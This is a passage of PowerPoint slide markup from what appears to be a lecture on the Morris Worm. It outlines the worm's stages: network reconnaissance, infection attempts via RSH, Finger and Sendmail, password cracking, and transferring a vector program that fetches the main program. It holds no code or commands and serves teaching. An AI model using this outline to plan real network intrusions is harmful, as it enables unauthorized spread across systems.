              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Gather information about network interfaces (incl. reachability tests)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rechteck 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1572228" y="1123945"/>
            <a:ext cx="9047543" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Current situation: Infection of a server is completed and main program starts working</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Grafik 25"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3005659" y="2873782"/>
            <a:ext cx="1599701" cy="1915513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rechteck 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1426352" y="1887083"/>
            <a:ext cx="1733537"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u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>List of Target Machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Verbinder: gewinkelt 24"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="28" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="709388" y="2536244"/>
            <a:ext cx="960139" cy="473789"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">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47" name="Gruppieren 46"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3159889" y="1943546"/>
            <a:ext cx="4636275" cy="1346876"/>
            <a:chOff x="3159889" y="1943546"/>
            <a:chExt cx="4636275" cy="1346876"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="20" name="Gruppieren 19"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4613700" y="1943546"/>
              <a:ext cx="3182464" cy="1346876"/>
              <a:chOff x="4476250" y="1573153"/>
              <a:chExt cx="3182464" cy="1346876"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Textfeld 7"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4560253" y="1573153"/>
                <a:ext cx="3071493" cy="707886"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="003366"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>2. </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" dirty="0"/>
                  <a:t>Infection attempts: </a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="1600" dirty="0"/>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" dirty="0"/>
                  <a:t>(1.) RSH, (2.) Finger, (3.) </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
                  <a:t>Sendmail</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="Pfeil: nach rechts 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4476250" y="2642236"/>
                <a:ext cx="3182464" cy="277793"/>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38" name="Gerade Verbindung mit Pfeil 37"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="28" idx="3"/>
              <a:endCxn id="8" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3159889" y="2293068"/>
              <a:ext cx="1537814" cy="4421"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">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46" name="Gruppieren 45"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1319949" y="3519661"/>
            <a:ext cx="6476215" cy="2373285"/>
            <a:chOff x="1319949" y="3519661"/>
            <a:chExt cx="6476215" cy="2373285"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="16" name="Gruppieren 15"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1319949" y="4692617"/>
              <a:ext cx="3470649" cy="1200329"/>
              <a:chOff x="1876855" y="4558974"/>
              <a:chExt cx="3470649" cy="1200329"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Textfeld 10"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1876855" y="4558974"/>
                <a:ext cx="3470649" cy="1200329"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="003366"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>3. </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" dirty="0"/>
                  <a:t>Collect information about </a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="1600" dirty="0"/>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" dirty="0"/>
                  <a:t>users and hosts, try to break </a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="1600" dirty="0"/>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" dirty="0"/>
                  <a:t>password, try to connect to</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" dirty="0"/>
                  <a:t>Victims with login-data</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="14" name="Gruppieren 13"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4560252" y="4917314"/>
                <a:ext cx="610484" cy="487857"/>
                <a:chOff x="8000117" y="2650708"/>
                <a:chExt cx="2003858" cy="1496114"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="12" name="Pfeil: nach oben gekrümmt 11"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm rot="10800000">
                  <a:off x="8000117" y="2650708"/>
                  <a:ext cx="1793718" cy="720550"/>
                </a:xfrm>
                <a:prstGeom prst="curvedUpArrow">
                  <a:avLst>
                    <a:gd name="adj1" fmla="val 40000"/>
                    <a:gd name="adj2" fmla="val 93008"/>
                    <a:gd name="adj3" fmla="val 25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Pfeil: nach oben gekrümmt 12"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8210257" y="3426272"/>
                  <a:ext cx="1793718" cy="720550"/>
                </a:xfrm>
                <a:prstGeom prst="curvedUpArrow">
                  <a:avLst>
                    <a:gd name="adj1" fmla="val 40000"/>
                    <a:gd name="adj2" fmla="val 93008"/>
                    <a:gd name="adj3" fmla="val 25000"/>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15" name="Pfeil: nach rechts 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4624701" y="3519661"/>
              <a:ext cx="3171463" cy="277793"/>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hteck 41"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5284258" y="4879932"/>
              <a:ext cx="1983673"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u="sng" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>User/Password/Hosts</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>User1/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>abc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>/Host A, Host B</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>…</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>…</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="43" name="Gerade Verbindung mit Pfeil 42"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="11" idx="3"/>
              <a:endCxn id="42" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="4790598" y="5285917"/>
              <a:ext cx="493660" cy="6865"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">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pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="Grafik 31"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7811868" y="2872265"/>
            <a:ext cx="1506716" cy="1968186"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33" name="Gruppieren 32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4590550" y="3865454"/>
            <a:ext cx="6608453" cy="1897516"/>
            <a:chOff x="4476250" y="3460336"/>
            <a:chExt cx="6608453" cy="1897516"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Textfeld 33"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7697568" y="4403745"/>
              <a:ext cx="3387135" cy="954107"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="003366"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003366"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>4. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0"/>
                <a:t>Transfer and execute vector program, which re-connects to server and transfer the main-program</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Pfeil: nach rechts 34"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="4476250" y="3460336"/>
              <a:ext cx="3171463" cy="27779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feld 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9738654" y="3023380"/>
            <a:ext cx="1801025" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="003366"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Main-Program Features and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Survival</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="292801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Morris Worm: Gather Information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269421" y="1193506"/>
            <a:ext cx="11585122" cy="4929502"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Gather information about network interfaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ioctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” and “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” calls with various arguments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add information about possible hosts into worm’s database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reachability tests by telnet and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rexec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Based on list of directly connected hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>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15</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pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Grafik 8" descr="netstat-tulpn Command"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="9405"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6660481" y="3105571"/>
            <a:ext cx="5244776" cy="2623897"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rechteck 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2161011" y="4271756"/>
            <a:ext cx="2329967" cy="1311949"/>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u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>List of Target Machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="Gruppieren 33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9536578" y="66468"/>
            <a:ext cx="2489521" cy="764304"/>
            <a:chOff x="318444" y="1887083"/>
            <a:chExt cx="9544735" cy="3113466"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Grafik 10"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3005659" y="2873782"/>
              <a:ext cx="1599701" cy="1915513"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Grafik 11"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7886594" y="2332213"/>
              <a:ext cx="1009598" cy="1318813"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Grafik 12"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8751919" y="2593800"/>
              <a:ext cx="1009598" cy="1318813"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Grafik 13"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7881854" y="3450858"/>
              <a:ext cx="1009598" cy="1318813"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15" name="Grafik 14"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8853581" y="3681736"/>
              <a:ext cx="1009598" cy="1318813"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="16" name="Gruppieren 15"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="318444" y="1887083"/>
              <a:ext cx="2841445" cy="2118378"/>
              <a:chOff x="318444" y="1887083"/>
              <a:chExt cx="2841445" cy="2118378"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17" name="Textfeld 16"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="318444" y="3253207"/>
                <a:ext cx="2488555" cy="752254"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="003366"/>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="003366"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>1. </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0"/>
                  <a:t>Gather information about network interfaces (incl. reachability tests)</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="18" name="Rechteck 17"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1426352" y="1887083"/>
                <a:ext cx="1733537"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List of Target Machines</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Host A</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>…</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>…</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="19" name="Verbinder: gewinkelt 18"/>
              <p:cNvCxnSpPr>
                <a:endCxn id="18" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="5400000" flipH="1" flipV="1">
                <a:off x="709388" y="2536244"/>
                <a:ext cx="960139" cy="473789"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">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300697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Morris Worm: Infection attempts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269421" y="1193506"/>
            <a:ext cx="11585122" cy="4929502"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>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16</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sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Inhaltsplatzhalter 2"/>
